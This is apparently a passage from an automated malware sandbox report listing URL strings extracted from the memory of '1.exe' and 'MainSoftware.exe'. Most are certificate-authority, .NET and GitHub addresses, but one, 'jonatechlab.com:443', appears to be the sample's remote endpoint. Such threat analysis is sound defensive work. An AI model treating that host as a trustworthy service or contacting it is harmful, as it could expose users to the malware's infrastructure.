    Source: 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261783516.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1596877787.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247148881.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
    Source: 1.exe, 00000004.00000003.1317343303.000000000823B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
    Source: 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: MainSoftware.exe, 00000015.00000003.2229773115.000002BDCBA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: MainSoftware.exe, 00000010.00000002.2140289283.00000234A3045000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140289283.00000234A3086000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140289283.00000234A30B7000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140289283.00000234A309A000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140289283.00000234A3069000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jonatechlab.com:443/
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261783516.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1596877787.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247148881.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
    Source: 1.exe, 00000004.00000003.1317343303.000000000823B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
    Source: 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globa
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsig
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0?
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0P
    Source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538160000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
    Source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538160000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
    Source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538160000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: 1.exe, 00000004.00000003.1588667153.000000000C9EE000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: 1.exe, 00000004.00000003.1588667153.000000000C9EE000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
    Source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
    Source: 1.exe, 00000004.00000003.1317343303.000000000823B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261783516.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1596877787.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247148881.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha3lx
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
    Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C576000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.00000275358B3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/binaryformatter
    Source: MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.00000275358B3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com)
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.00000275358B3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
    Source: MainSoftware.exe, 00000010.00000002.2141123759.00000275358B3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
    Source: MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/info
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
    Source: MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
    Source: 1.exe, 00000004.00000003.1588667153.000000000C539000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141601509.0000027536021000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141547348.0000027536009000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED50000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/FantasticFiasco/serilog-sinks-http.git
    Source: 1.exe, 00000004.00000003.1588667153.000000000C684000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dot
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C703000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C55A000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5EA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C6B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000CA07000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C976000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C9A5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5B9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5C5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5DB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C66E000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C993000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5D2000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C9EE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C570000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C699000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C57D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C961000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C9AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
    Source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
    Source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
    Source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538147000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimeE
    Source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimeGk
    Source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F9000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtimet
    Source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
    Source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
    Source: 1.exe, 00000004.00000003.1588667153.000000000C523000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140213322.00000234A0741000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141475912.0000027535FE0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140154271.00000234A070D000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/serilog/serilog
